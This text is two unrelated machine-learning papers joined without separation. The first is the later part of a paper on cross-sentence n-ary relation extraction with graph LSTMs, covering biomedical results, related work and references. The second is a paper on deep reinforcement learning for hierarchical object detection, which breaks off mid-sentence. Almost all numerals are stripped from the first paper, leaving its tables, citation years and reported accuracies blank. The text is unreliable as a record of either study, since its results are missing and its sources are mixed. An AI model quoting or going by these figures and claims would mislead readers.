table shows the results, which are similar to the ternary case: graph lstm-full consistently performed the best for both single-sentence and cross-sentence instances. bilstms on the shortest path substantially underperformed bilstms or graph lstms, losing between - absolute points in accuracy, which could be attributed to the lower parsing quality in the biomedical domain. interestingly, the state-of-the-art tree lstms (miwa and bansal, ) also underperformed graph lstms, even though they encoded essentially the same linguistic structures (word adjacency and syntactic dependency). we attribute the gain to the fact that miwa and bansal ( ) used separate lstms for the linear chain and the dependency tree, whereas graph lstms learned a single representation for both.

to evaluate whether joint learning with sub-relations can help, we conducted multi-task learning using graph lstm-full to jointly train extractors for both the ternary interaction and the drug-mutation and drug-gene sub-relations. table shows the results. multi-task learning resulted in a significant gain for both the ternary interaction and the drug-mutation interaction. interestingly, the advantage of graph lstms over bilstms is reduced with multi-task learning, suggesting that with more supervision signal, even linear-chain lstms can learn to capture long-range dependencies that were made evident by parse features in graph lstms. note that there are many more instances for drug-gene interaction than for the others, so we only sampled a subset of comparable size. therefore, we do not evaluate the performance gain for drug-gene interaction, as in practice one would simply learn from all available data, and the sub-sampled results are not competitive.

we included coreference and discourse relations in our document graph. however, we didn't observe any significant gains, similar to the observation in quirk and poon ( ). we leave further exploration to future work.

. pubmed-scale extraction

our ultimate goal is to extract all knowledge from available text. we thus retrained our model using the best system from automatic evaluation (i.e., graph lstm-full) on all available data. the resulting model was then used to extract relations from all pubmed central articles.

table shows the number of candidates and extracted interactions. with as little as unique drug-gene-mutation triples from the two databases (there are more in the databases, but these are the only ones for which we found matching instances in the text; in future work, we will explore various ways to increase the number, e.g., by matching underspecified drug classes to specific drugs), we learned to extract orders of magnitude more unique interactions. the results also highlight the benefit of cross-sentence extraction, which yields to times more relations than single-sentence extraction. table conducts a similar comparison on the unique number of drugs, genes, and mutations. again, machine reading covers far more unique entities, especially with cross-sentence extraction.

               single-sent.   cross-sent.
candidates     ,              ,
p ≥ .          ,              ,
p ≥ .          ,
gdkd + civic
table : numbers of unique drug-gene-mutation interactions extracted from pubmed central articles, compared to that from manually curated kbs used in distant supervision. p signifies output probability.

. manual evaluation

our automatic evaluations are useful for comparing competing approaches, but may not reflect the true classifier precision as the labels are noisy. therefore, we randomly sampled extracted relation instances and asked three researchers knowledgeable in precision medicine to evaluate their correctness. for each instance, the annotators were presented with the provenance: sentences with the drug, gene, and mutation highlighted.
the annotators determined in each case whether this instance implied that the given entities were related. note that the evaluation does not attempt to identify whether the relationships are true or replicated in follow-up papers; rather, it focuses on whether the relationships are entailed by the text.

we focused our evaluation efforts on the cross-sentence ternary-relation setting. we considered three probability thresholds: . for a high-precision but potentially low-recall setting, . , and a random sample of all candidates. in each case, instances were selected for a total of annotations. a subset of instances were reviewed by two annotators, and the inter-annotator agreement was %.

                          drug   gene   mut.
gdkd + civic
single-sent. (p ≥ . )
single-sent. (p ≥ . )
cross-sent. (p ≥ . )
cross-sent. (p ≥ . )
table : numbers of unique drugs, genes and mutations in extraction from pubmed central articles, in comparison with that in the manually curated gene drug knowledge database (gdkd) and clinical interpretations of variants in cancer (civic) used for distant supervision. p signifies output probability.

           entity error   relation error   precision
random     %              %                %
p ≥ .      %              %                %
p ≥ .      %              %                %
table : sample precision of drug-gene-mutation interactions extracted from pubmed central articles. p signifies output probability.

table shows that the classifier indeed filters out a large portion of potential candidates, with estimated instance accuracy of % at the threshold of . , and % at . . interestingly, lstms are effective at screening out many entity mention errors, presumably because they include broad contextual features.

domain: genetic pathways

we also conducted experiments on extracting genetic pathway interactions using the genia event extraction dataset (kim et al., ). this dataset contains gold syntactic parses for the sentences, which offered a unique opportunity to investigate the impact of syntactic analysis on graph lstms. it also allowed us to test our framework in supervised learning. the original shared task evaluated on complex, nested events for nine event types, many of which are unary relations (kim et al., ). following poon et al. ( ), we focused on gene regulation and reduced it to binary-relation classification for head-to-head comparison. we followed their experimental protocol by sub-sampling negative examples to be about three times the number of positive examples.

since the dataset is not entirely balanced, we reported precision, recall, and f . we used our best-performing graph lstm from the previous experiments. by default, automatic parses were used in the document graphs, whereas in graph lstm (gold), gold parses were used instead. table shows the results. once again, despite the lack of intense feature engineering, linear-chain lstms performed on par with the feature-based classifier (poon et al., ). graph lstms exhibited a more commanding advantage over linear-chain lstms in this domain, substantially outperforming the latter (p < . by mcnemar's chi-square test).

model               precision   recall   f
poon et al. ( )     .           .        .
bilstm              .           .        .
graph lstm          .           .        .
graph lstm (gold)   .           .        .
table : genia test results on the binary relation of gene regulation. graph lstm (gold) used gold syntactic parses in the document graph.
most interestingly, graph lstms using gold parses significantly outperformed that using automatic parses, suggesting that encoding high-quality analysis is particularly beneficial. related work most work on relation extraction has been applied to binary relations of entities in a single sentence. we first review relevant work on the single-sentence bi- nary relation extraction task, and then review related work on n-ary and cross-sentence relation extraction. binary relation extraction the traditional feature- based methods rely on carefully designed features to learn good models, and often integrate diverse sources of evidence such as word sequences and syn- tax context (kambhatla, ; guodong et al., ; boschee et al., ; suchanek et al., ; chan and roth, ; nguyen and grishman, ). the kernel-based methods design various subsequence or tree kernels (mooney and bunescu, ; bunescu and mooney, ; qian et al., ) to capture struc- tured information. recently, models based on neural networks have advanced the state of the art by auto- matically learning powerful feature representations (xu et al., a; zhang et al., ; santos et al., ; xu et al., b; xu et al., ). most neural architectures resemble figure , where there is a core representation learner (blue) that takes word embeddings as input and produces contextual entity representations. such representa- tions are then taken by relation classifiers to pro- duce the final predictions. effectively representing sequences of words, both convolutional (zeng et al., ; wang et al., ; santos et al., ) and rnn-based architectures (zhang et al., ; socher et al., ; cai et al., ) have been successful. most of these have focused on modeling either the surface word sequences or the hierarchical syntac- tic structure. miwa and bansal ( ) proposed an architecture that benefits from both types of informa- tion, using a surface sequence layer, followed by a dependency-tree sequence layer. n-ary relation extraction early work on extract- ing relations between more than two arguments has been done in muc- , with a focus on fact/event extraction from news articles (chinchor, ). se- mantic role labeling in the propbank (palmer et al., ) or framenet (baker et al., ) style are also instances of n-ary relation extraction, with extrac- tion of events expressed in a single sentence. mc- donald et al. ( ) extract n-ary relations in a bio- medical domain, by first factoring the n-ary relation into pair-wise relations between all entity pairs, and then constructing maximal cliques of related enti- ties. recently, neural models have been applied to semantic role labeling (fitzgerald et al., ; roth and lapata, ). these works learned neural rep- resentations by effectively decomposing the n-ary relation into binary relations between the predicate and each argument, by embedding the dependency path between each pair, or by combining features of the two using a feed-forward network. although some re-ranking or joint inference models have been employed, the representations of the individual argu- ments do not influence each other. in contrast, we propose a neural architecture that jointly represents n entity mentions, taking into account long-distance dependencies and inter-sentential information. 
cross-sentence relation extraction several rela- tion extraction tasks have benefited from cross- sentence extraction, including muc fact and event extraction (swampillai and stevenson, ), record extraction from web pages (wick et al., ), extrac- tion of facts for biomedical domains (yoshikawa et al., ), and extensions of semantic role labeling to cover implicit inter-sentential arguments (gerber and chai, ). these prior works have either relied on explicit co-reference annotation, or on the assump- tion that the whole document refers to a single co- herent event, to simplify the problem and reduce the need for powerful representations of multi-sentential contexts of entity mentions. recently, cross-sentence relation extraction models have been learned with distant supervision, and used integrated contextual evidence of diverse types without reliance on these assumptions (quirk and poon, ), but that work focused on binary relations only and explicitly engi- neered sparse indicator features. relation extraction using distant supervision distant supervision has been applied to extraction of binary (mintz et al., ; poon et al., ) and n-ary (reschke et al., ; li et al., ) relations, traditionally using hand-engineered features. neural architectures have recently been applied to distantly supervised extraction of binary relations (zeng et al., ). our work is the first to propose a neural archi- tecture for n-ary relation extraction, where the repre- sentation of a tuple of entities is not decomposable into independent representations of the individual entities or entity pairs, and which integrates diverse information from multi-sentential context. to utilize training data more effectively, we show how multi- task learning for component binary sub-relations can improve performance. our learned representation combines information sources within a single sen- tence in a more integrated and generalizable fashion than prior approaches, and can also improve perfor- mance on single-sentence binary relation extraction. conclusion we explore a general framework for cross-sentence n- ary relation extraction based on graph lstms. the graph formulation subsumes linear-chain and tree lstms and makes it easy to incorporate rich linguis- tic analysis. experiments on biomedical domains showed that extraction beyond the sentence bound- ary produced far more knowledge, and encoding rich linguistic knowledge provided consistent gain. while there is much room to improve in both recall and precision, our results indicate that machine read- ing can already be useful in precision medicine. in particular, automatically extracted facts (section . ) can serve as candidates for manual curation. instead of scanning millions of articles to curate from scratch, human curators would just quickly vet thousands of extractions. the errors identified by curators offer direct supervision to the machine reading system for continuous improvement. therefore, the most im- portant goal is to attain high recall and reasonable precision. our current models are already quite capa- ble. future directions include: interactive learning with user feedback; improving discourse modeling in graph lstms; exploring other backpropagation strategies; joint learning with entity linking; applica- tions to other domains. acknowledgements we thank daniel fried and ming-wei chang for use- ful discussions, as well as the anonymous reviewers and editor-in-chief mark johnson for their helpful comments. 
references collin baker, charles fillmore, and john lowe. . the berkeley framenet project. in proceedings of the thirty-sixth annual meeting of the association for computational linguistics and seventeenth interna- tional conference on computational linguistics. dane bell, gustave hahn-powell, marco a. valenzuela- escarcega, and mihai surdeanu. . an investi- gation of coreference phenomena in the biomedical domain. in proceedings of the tenth edition of the language resources and evaluation conference. yoshua bengio, patrice simard, and paolo frasconi. . learning long-term dependencies with gradient descent is difficult. ieee transactions on neural networks, ( ). elizabeth boschee, ralph weischedel, and alex zama- nian. . automatic information extraction. in proceedings of the international conference on intelli- gence analysis. razvan c bunescu and raymond j mooney. . a shortest path dependency kernel for relation extraction. in proceedings of the conference on empirical meth- ods in natural language processing. rui cai, xiaodong zhang, and houfeng wang. . bidirectional recurrent convolutional neural network for relation classification. in proceedings of the fifty- fourth annual meeting of the association for compu- tational linguistics. rich caruana, steve lawrence, and lee giles. . overfitting in neural nets: backpropagation, conjugate gradient, and early stopping. in proceedings of the fifteenth annual conference on neural information processing systems. rich caruana. . multitask learning. in learning to learn. springer. yee seng chan and dan roth. . exploiting back- ground knowledge for relation extraction. in proceed- ings of the twenty-third international conference on computational linguistics. nancy chinchor. . overview of muc- /met- . technical report, science applications international corporation, san diego, ca. ronan collobert and jason weston. . a unified ar- chitecture for natural language processing: deep neural networks with multitask learning. in proceedings of the twenty-fifth international conference on machine learning. mark craven and johan kumlien. . constructing biological knowledge bases by extracting information from text sources. in proceedings of the seventh inter- national conference on intelligent systems for molecu- lar biology. marie-catherine de marneffe, bill maccartney, and christopher d. manning. . generating typed dependency parses from phrase structure parses. in proceedings of the fifth international conference on language resources and evaluation. rodrigo dienstmann, in sock jang, brian bot, stephen friend, and justin guinney. . database of ge- nomic biomarkers for cancer drugs and clinical tar- getability in solid tumors. cancer discovery, . nicholas fitzgerald, oscar täckström, kuzman ganchev, and dipanjan das. . semantic role labeling with neural network factors. in proceedings of the con- ference on empirical methods in natural language processing. matthew gerber and joyce y. chai. . beyond nom- bank: a study of implicit arguments for nominal predi- cates. in proceedings of the forty-eighth annual meet- ing of the association for computational linguistics. alan graves, abdel-rahman mohamed, and geoffrey hin- ton. . speech recognition with deep recurrent neural networks. in proceedings of the thirty-eighth ieee international conference on acoustics, speech and signal processing. zhou guodong, su jian, zhang jie, and zhang min. . exploring various knowledge in relation extraction. 
in proceedings of the forty-third annual meeting of the association for computational linguistics. sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ). nanda kambhatla. . combining lexical, syntactic, and semantic features with maximum entropy models for extracting relations. in proceedings of the forty- second annual meeting of the association for compu- tational linguistics, demonstration sessions. jin-dong kim, tomoko ohta, sampo pyysalo, yoshi- nobu kano, and jun’ichi tsujii. . overview of bionlp’ shared task on event extraction. in proceed- ings of the workshop on current trends in biomedical natural language processing: shared task. heeyoung lee, angel chang, yves peirsman, nathanael chambers, mihai surdeanu, and dan jurafsky. . deterministic coreference resolution based on entity- centric, precision-ranked rules. computational linguis- tics, ( ). hong li, sebastian krause, feiyu xu, andrea moro, hans uszkoreit, and roberto navigli. . improvement of n-ary relation extraction by adding lexical semantics to distant-supervision rule learning. in proceedings of the seventh international conference on agents and artificial intelligence. yujia li, daniel tarlow, marc brockschmidt, and richard zemel. . gated graph sequence neural networks. in proceedings of the fourth international conference on learning representations. xiaodan liang, xiaohui shen, jiashi feng, liang lin, and shuicheng yan. . semantic object parsing with graph lstm. in proceedings of european conference on computer vision. christopher d. manning, mihai surdeanu, john bauer, jenny finkel, steven j. bethard, and david mcclosky. . the stanford corenlp natural language pro- cessing toolkit. in proceedings of the fifty-second annual meeting of the association for computational linguistics: system demonstrations. ryan mcdonald, fernando pereira, seth kulick, scott winters, yang jin, and pete white. . simple algo- rithms for complex relation extraction with applications to biomedical ie. in proceedings of the forty-third annual meeting on association for computational lin- guistics. mike mintz, steven bills, rion snow, and dan juraf- sky. . distant supervision for relation extraction without labeled data. in proceedings of the joint con- ference of the forty-seventh annual meeting of the as- sociation for computational linguistics and the fourth international joint conference on natural language processing. makoto miwa and mohit bansal. . end-to-end re- lation extraction using lstms on sequences and tree structures. in proceedings of the fifty-fourth annual meeting of the association for computational linguis- tics. raymond j mooney and razvan c bunescu. . subse- quence kernels for relation extraction. in proceedings of the nineteen annual conference on neural informa- tion processing systems. thien huu nguyen and ralph grishman. . employ- ing word representations and regularization for domain adaptation of relation extraction. in proceedings of the fifty-second annual meeting of the association for computational linguistics. martha palmer, daniel gildea, and paul kingsbury. . the proposition bank: an annotated corpus of seman- tic roles. computational linguistics, ( ). razvan pascanu, tomas mikolov, and yoshua bengio. . on the difficulty of training recurrent neural networks. in proceedings of the thirtieth international conference on machine learning. nanyun peng and mark dredze. . improving named entity recognition for chinese social media with word segmentation representation learning. 
in proceedings of the fifty-fourth annual meeting of the association for computational linguistics. jeffrey pennington, richard socher, and christopher d. manning. . glove: global vectors for word repre- sentation. in proceedings of the conference on empiri- cal methods in natural language processing. hoifung poon, chris quirk, charlie deziel, and david heckerman. . literome: pubmed-scale genomic knowledge base in the cloud. bioinformatics, ( ). hoifung poon, kristina toutanova, and chris quirk. . distant supervision for cancer pathway extraction from text. in pacific symposium on biocomputing. longhua qian, guodong zhou, fang kong, qiaoming zhu, and peide qian. . exploiting constituent dependencies for tree kernel-based semantic relation extraction. in proceedings of the twenty-second inter- national conference on computational linguistics. chris quirk and hoifung poon. . distant supervi- sion for relation extraction beyond the sentence bound- ary. in proceedings of the fifteenth conference on european chapter of the association for computational linguistics. chris quirk, pallavi choudhury, jianfeng gao, hisami suzuki, kristina toutanova, michael gamon, wen-tau yih, and lucy vanderwende. . msr splat, a language analysis toolkit. in proceedings of the confer- ence of the north american chapter of the association for computational linguistics: human language tech- nologies, demonstration session. kevin reschke, martin jankowiak, mihai surdeanu, christopher d manning, and daniel jurafsky. . event extraction using distant supervision. in proceed- ings of eighth edition of the language resources and evaluation conference. michael roth and mirella lapata. . neural semantic role labeling with dependency path embeddings. in proceedings of the fifty-fourth annual meeting of the association for computational linguistics. cicero nogueira dos santos, bing xiang, and bowen zhou. . classifying relations by ranking with convolutional neural networks. in proceedings of the fifty-third annual meeting of the association for com- putational linguistics. franco scarselli, marco gori, ah chung tsoi, markus hagenbuchner, and gabriele monfardini. . the graph neural network model. ieee transactions on neural networks, ( ). richard socher, brody huval, christopher d manning, and andrew y ng. . semantic compositionality through recursive matrix-vector spaces. in proceedings of the joint conference on empirical methods in natu- ral language processing and computational natural language learning. fabian m suchanek, georgiana ifrim, and gerhard weikum. . combining linguistic and statistical analysis to extract relations from web documents. in proceedings of the twelfth international conference on knowledge discovery and data mining. mihai surdeanu and ji heng. . overview of the english slot filling track at the tac knowledge base population evaluation. in proceedings of the u.s. national institute of standards and technology knowl- edge base population workshop. kumutha swampillai and mark stevenson. . extract- ing relations within and across sentences. in proceed- ings of the conference on recent advances in natural language processing. kai sheng tai, richard socher, and christopher d man- ning. . improved semantic representations from tree-structured long short-term memory networks. in proceedings of the fifty-third annual meeting of the association for computational linguistics. theano development team. . theano: a python framework for fast computation of mathematical ex- pressions. arxiv e-prints, abs/ . . 
linlin wang, zhu cao, gerard de melo, and zhiyuan liu. . relation classification via multi-level attention cnns. in proceedings of the fifty-fourth annual meet- ing of the association for computational linguistics. michael wick, aron culotta, and andrew mccallum. . learning field compatibilities to extract database records from unstructured text. in proceedings of the conference on empirical methods in natural language processing. kun xu, yansong feng, songfang huang, and dongyan zhao. a. semantic relation classification via convolutional neural networks with simple negative sampling. in proceedings of conference on empirical methods in natural language processing. yan xu, lili mou, ge li, yunchuan chen, hao peng, and zhi jin. b. classifying relations via long short term memory networks along shortest dependency paths. in proceedings of conference on empirical methods in natural language processing. yan xu, ran jia, lili mou, ge li, yunchuan chen, yangyang lu, and zhi jin. . improved relation classification by deep recurrent neural networks with data augmentation. in proceedings of the twenty-sixth international conference on computational linguis- tics. nianwen xue, hwee tou ng, sameer pradhan, rashmi prasad, christopher bryant, and attapol rutherford. . the conll- shared task on shallow dis- course parsing. in proceedings of the conference on computational natural language learning, shared task. katsumasa yoshikawa, sebastian riedel, tsutomu hi- rao, masayuki asahara, and yuji matsumoto. . coreference based event-argument relation extraction on biomedical text. journal of biomedical semantics, ( ). daojian zeng, kang liu, siwei lai, guangyou zhou, jun zhao, et al. . relation classification via convo- lutional deep neural network. in proceedings of the twenty-sixth international conference on computa- tional linguistics. daojian zeng, kang liu, yubo chen, and jun zhao. . distant supervision for relation extraction via piecewise convolutional neural networks. in proceedings of the conference on empirical methods in natural language processing. shu zhang, dequan zheng, xinchen hu, and ming yang. . bidirectional long short-term memory networks for relation classification. in proceedings of twenty- ninth pacific asia conference on language, informa- tion and computation. international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - hierarchical image object search based on deep reinforcement learning wei zhang school of computer science and engineering xi'an technological university xi'an, china e-mail: weivanity@ gmail.com hongge yao school of computer science and engineering xi'an technological university xi'an, china e-mail: @qq.com yuxing tan school of computer science and engineering xi'an technological university xi'an, china e-mail: @qq.com abstract—object detection technology occupies a pivotal position in the field of modern computer vision research, its purpose is to accurately locate the object human beings are looking for in the image and classify the object. with the development of deep learning technology, convolutional neural networks are widely used because of their outstanding performance in feature extraction, which greatly improves the speed and accuracy of object detection. in recent years, reinforcement learning technology has emerged in the field of artificial intelligence, showing excellent decision-making ability to deal with problems. 
in order to combine the perception ability of deep learning technology with the decision-making ability of reinforcement learning technology, this paper incorporate reinforcement learning into the convolutional neural network, and propose a hierarchical deep reinforcement learning object detection model. keywords-object detection; deep learning; reinforcement learning i. introduction when observing a picture, humans can immediately know the location and category of the object in the image, and can get the information without even thinking too much. this is a breeze for us, but the computer cannot have all kinds of complicated ideas of our human brain, and it is not easy to realize it. in computer vision, the positioning and retrieval of images will be affected by two aspects, one is the content of the image, and the other is the pros and cons of the algorithm. there are two main factors influencing the image. the first is that the background and light when taking pictures will affect the quality of the image, resulting in a decrease in the accuracy of object detection. the second is the content of the image. if there are several similar objects, or some are mailto: @qq.com international journal of advanced network, monitoring and controls volume , no. , blocked by other objects, and the different angles of the object will affect the accuracy of detection. the algorithm mainly focuses on how to make the features have higher quality. therefore, how to design an algorithm that can satisfy accurate positioning and continuously improve the object positioning speed is the key to research. for computers, these pictures are data collections which are composed of binary digits, and the things behind the data cannot be imagined by computers. our purpose is to let the computer simulate our human vision and simply have the ability to process the image. human beings get a lot of information in real life every day, and most of them belongs to the information transmitted to us by vision, and only part of the information in these visual images is what human need. therefore, by extracting the important information, positioning and identifying them accurately, human can greatly reduce the amount of data that the computer needs to process and improve the efficiency of data processing. reinforcement learning is an important field in machine learning. it constructs a markov decision process and simulates human thinking to teach agents how to make actions that can obtain high reward values in the environment, and find the best strategy to solve the problem in such constant interaction. based on this idea, this paper use reinforcement learning technology to simulate the human visual attention mechanism. the agent is taught to change the shape of the bounding box and focus only on a significant part of the image at a time, and then extract its features through the convolutional neural network. finally, the object of image positioning and classification can be achieved. ii. related work a. traditional object detection algorithm traditional object detection algorithms include primary feature extraction methods such as hog feature extraction of objects and training svm classifiers for recognition. their algorithms are generally divided into three stages (see figure .): ) select different sliding window frames according to the size of the object, and use the sliding window to select a part of the content in the figure as a candidate area. ) extract visual features from candidate regions. 
) use svm classifier for identification. figure . traditional object detection algorithm the traditional object search algorithm has the following disadvantages: ) the selection strategy based on sliding windows is to slide across the entire image from beginning to end. for different object sizes, the program need windows with different size ratios to traverse. although it can mark all the positions of the object, its brute-force enumeration search results in extremely high time complexity and a large number of windows that are not related to the object, so the speed and performance of feature extraction and classification have fallen into a bottleneck. ) the characteristics of each object are different, which leads to the diversity of forms, and the background factors of each object will also affect the accuracy of recognition. therefore, the features of manual design are not very robust. input image region selection feature extraction classification international journal of advanced network, monitoring and controls volume , no. , b. object detection algorithm based on deep learning after the appearance of cnn, it has been widely used in the field of computer vision. with the continuous development of science and technology, the difficulty of obtaining a large amount of sample data has been significantly reduced, and the continuous improvement of computing capabilities has enabled cnn to have the ability to extract features from a large amount of data, which has made huge gains in computer vision. aiming at the shortcomings of traditional method for object detection, the object detection algorithm based on deep learning uses cpmc, selective search, mcg, rpn and other methods to generate candidate regions instead of window sliding strategy. these methods usually use various details of the image, such as image contrast, edge parts and color to extract higher-quality candidate regions, while reducing the number of candidate regions and time complexity. this type of object detection method is generally divided into two types: one-stage detection algorithm and two-stage detection algorithm. the one-stage detection algorithm regards the object detection problem as a regression problem and directly obtains the category and position information of the object. the detection speed of the algorithm is fast, but the accuracy is low. the two-stage detection algorithm first generates a large number of region proposals, and then classifies these region proposals through the convolutional neural network, so the accuracy is higher, but the detection speed is slower. c. object detection algorithm based on deep reinforcement learning in recent years, research on deep reinforcement learning has emerged endlessly. it has achieved excellent performance in many games than human master players, especially the success of the deepmind team on the alphago project, pushing deep reinforcement learning to a new height. in this context, many researchers try to apply deep reinforcement learning technology in the field of object detection. in , caicedo et al. adopted a top-down search strategy, analyzed the entire scene at the beginning, and then continued to move toward the object location. that is, use a larger bounding box to frame the object, and then shrink it step by step, eventually making the object surrounded by a compact bounding box. in , mathe et al. 
proposed an image-based sequential search model that extracts image features from a small number of pre-selected image positions in order to search for visual objects efficiently. by formulating sequential search as reinforcement learning of the search policy, their fully trainable model can explicitly balance, for each class, the conflicting goals of exploration (sampling more image regions for better accuracy) and exploitation (stopping the search efficiently when sufficiently confident about the object's location). the algorithm models above all use reinforcement learning techniques to improve deep learning algorithms, and all have achieved good results. however, if the visual object algorithm is required to have a relatively high accuracy, it still needs to rely on a large number of candidate regions, so our research direction is to reduce the number of candidate regions while keeping the quality of the candidate regions at a high level.

iii. hierarchical object search model based on drl

a. mdp formulation

this paper regards object detection as a markov decision process and finds an effective object detection strategy by solving the decision problem. at each step, the agent interacts with the current environment based on the current state, decides the next search action, and receives an immediate reward. the agent continuously improves its search efficiency in the process of learning to obtain a high cumulative reward.

the action space a is composed of two different types of actions: selection actions and a stop action. a selection action frames a part of the current area as the next observation area; the selection actions consist of four border regions and a center region, which respectively reduce the current search area to different sub-regions (see figure ). the stop action indicates that the object has been found, so the bounding box is no longer changed and the search process stops.

in reinforcement learning, the state is the premise and basis for the agent to make actions. in this model, the state is composed of two aspects: one is the feature vector extracted by the convolutional neural network from the current observation region; the other is the history of actions performed while searching for the object. this history helps stabilize the search trajectory, so that the search does not fall into a loop, thereby improving the accuracy of the search.

figure . the selection action diagram
figure . sample generation process diagram based on the markov decision process

the function of the reward is to reflect the feedback obtained by the agent during its interaction with the environment. the agent judges the merits of an action according to the different rewards received, and finally learns the strategy by maximizing the cumulative reward. since the agent has two types of actions, the reward calculation differs depending on the type of action. the reward obtained by the agent depends on the action it takes in the current state. the model uses the overlap rate (intersection over union) between the observation area and the ground-truth object area to evaluate the effect of an action, so that the accuracy of detection can be measured.
this paper takes b' as the observation area after the movement, b as the observation area before the movement, and g as the ground-truth object area; r is the reward obtained after making a selection action. the reward for a selection action is then determined by the change in the overlap rate between the observation area and the object area: if the difference of the overlap rate is positive, it means that the prediction range has moved closer to the object area; if it is negative, it means that the prediction range has moved farther from the object area. in other words, if the decision improves the detection accuracy, the reward is positive, otherwise the reward is negative.

for the stop action, the model uses a separate reward function and assigns the stop action a fixed reward value. at the same time, the program needs a threshold to determine when to end the search: when the overlap rate is greater than the threshold, indicating that the object has been found, the program can end the search and perform the stop action. alongside this reward there is also a punishment, applied when the overlap rate remains below the threshold and the maximum number of search steps is reached, so that the agent recognizes the wrong process and corrects it.

b. dqn algorithm

the model uses three fully connected layers to form the q-network. its input is the information content of the image, and the activation values of the neurons in the output layer represent the confidence of the different actions, among which the action with the highest confidence is selected. according to the states, actions and reward function, the agent applies the q-learning algorithm to learn the optimal strategy. because the input image is high-dimensional data, this paper uses the q-network to approximate the q function in high dimensions. the q function under strategy π gives the expected cumulative discounted reward of taking an action in a state and following π thereafter. the agent selects the action with the highest q value from the q function, and uses the bellman equation to continuously update the q function:

$$ q(s_t, a_t) = r_t + \gamma \max_{a_{t+1}} q(s_{t+1}, a_{t+1}) $$

among them, $s_t$ is the current state, $a_t$ is the selected action in the current state, $r_t$ is the immediate reward, $\gamma$ is the discount factor, $s_{t+1}$ indicates the next state, and $a_{t+1}$ indicates the next action to be taken.

in order to train the q-network, the program needs a large number of training samples, which are usually collected sequentially (see figure ), but the continuity between adjacent samples causes inefficiency and instability in q-network learning. this paper uses the experience-replay mechanism to solve this problem: when the capacity of the experience pool tends to be saturated, the program constantly replaces the old samples with new samples, and, in order to make most of the samples selected with nearly the same probability, the program randomly draws samples from the experience pool. the loss function of the training process is set as follows:

$$ l = \big( y_t - q(s_t, a_t) \big)^2, \qquad y_t = r_t + \gamma \max_{a_{t+1}} q(s_{t+1}, a_{t+1}) $$

among them, $q(s_t, a_t)$ is the actual output of the network, $y_t$ is the expected output of the network, $r_t$ is the current reward value, $\gamma \max_{a_{t+1}} q(s_{t+1}, a_{t+1})$ is the maximum expected reward value for the next decision, and $\gamma$ is the discount factor.
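the reward and loss computations above can be sketched in a few lines of python; the sign-shaped selection reward, the fixed stop reward and penalty values, the threshold, and the replay-buffer size are illustrative assumptions rather than the exact settings of this paper.

```python
import random
from collections import deque

def iou(box_a, box_b):
    """overlap rate of two boxes given as (x1, y1, x2, y2)."""
    ix1, iy1 = max(box_a[0], box_b[0]), max(box_a[1], box_b[1])
    ix2, iy2 = min(box_a[2], box_b[2]), min(box_a[3], box_b[3])
    inter = max(0, ix2 - ix1) * max(0, iy2 - iy1)
    area = lambda b: (b[2] - b[0]) * (b[3] - b[1])
    union = area(box_a) + area(box_b) - inter
    return inter / union if union > 0 else 0.0

def selection_reward(prev_box, new_box, gt_box):
    # positive if the move increases the overlap rate, negative otherwise
    return 1.0 if iou(new_box, gt_box) > iou(prev_box, gt_box) else -1.0

def stop_reward(box, gt_box, threshold=0.6, eta=3.0):
    # fixed reward when the overlap rate exceeds the threshold, penalty otherwise
    return eta if iou(box, gt_box) >= threshold else -eta

class ReplayBuffer:
    """experience pool: old samples are dropped once capacity is reached,
    and training minibatches are drawn uniformly at random."""
    def __init__(self, capacity=10000):
        self.pool = deque(maxlen=capacity)
    def push(self, s, a, r, s_next, done):
        self.pool.append((s, a, r, s_next, done))
    def sample(self, batch_size):
        return random.sample(self.pool, batch_size)

def td_target(r, q_next_values, gamma=0.9, done=False):
    # expected output y = r + gamma * max_a' q(s', a')
    return r if done else r + gamma * max(q_next_values)
```

in training, the loss for a sampled transition would then be (td_target(...) - q(s, a)) ** 2, matching the loss function given above.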
c. hierarchical object search process

the initial candidate region of the model is the entire image. the candidate region is normalized to a fixed size and then put into a trained cnn model to extract feature values. the agent then relies on the ε-greedy algorithm: with a certain probability it randomly selects one of all actions to search, and otherwise it uses the learned strategy to make the action decision. after the model makes an action, it switches to a new candidate area, which is a sub-region of the previous region, and the agent receives the corresponding reward according to the reward function. at the same time, the new candidate area is normalized and put into the neural network model for feature extraction, which is combined with the previous actions to obtain the new state. this hierarchical process is repeated until the action becomes a stop action, or the number of search steps reaches the upper limit. if a stop action occurs, the final reward is given according to the corresponding termination reward function.

iv. experiment

a. data sets and parameter settings

we use the pascal voc data set to train the model, which is the most widely used data set for object detection. the training set uses the combination of pascal voc and pascal voc , and the test set uses the pascal voc test set. the model uses three fully connected layers to form the q-network. its input is the information content of the image, and the activation values of neurons in the output layer represent the confidence of the actions. the parameters of the network are initialized from a standard normal distribution. the initial value of the greedy factor is ; every iteration it decreases by . , and it stops decreasing when it reaches . . the size of the experience pool is set to , the reward discount coefficient to . , and the threshold for the stop action to . .

b. experimental results and analysis

● model training

in the process of training the model, the value of the loss function continually declines as the neural network iterates, making the network tend to converge (see figure ). when the number of training iterations reaches a certain level, the loss value tends to be stable, the parameters of the network are updated accordingly, and a neural network model with recognition capability is formed.

figure . schematic diagram of the loss function

● results and analysis

the model first analyzes the entire picture and finds the object through a series of frame transformation actions. finally, the agent makes the stop action to indicate the end of the search. the following figure shows this hierarchical dynamic selection process in detail.

figure . hierarchical dynamic selection process

experimental results show that the algorithm model proposed in this paper can improve the search speed and accuracy in object search. however, it can also be seen from the experiment that there may still be errors in the match between the predicted object frame and the actual bounding box of the object, because the model can only continue to select from the area chosen by the previous bounding box. as a result, the predicted bounding box cannot reach other areas of the image. the model can improve the detection result by choosing an appropriate proportion for the framed area.

v. conclusion

this paper proposes an object detection model based on deep reinforcement learning, which focuses on
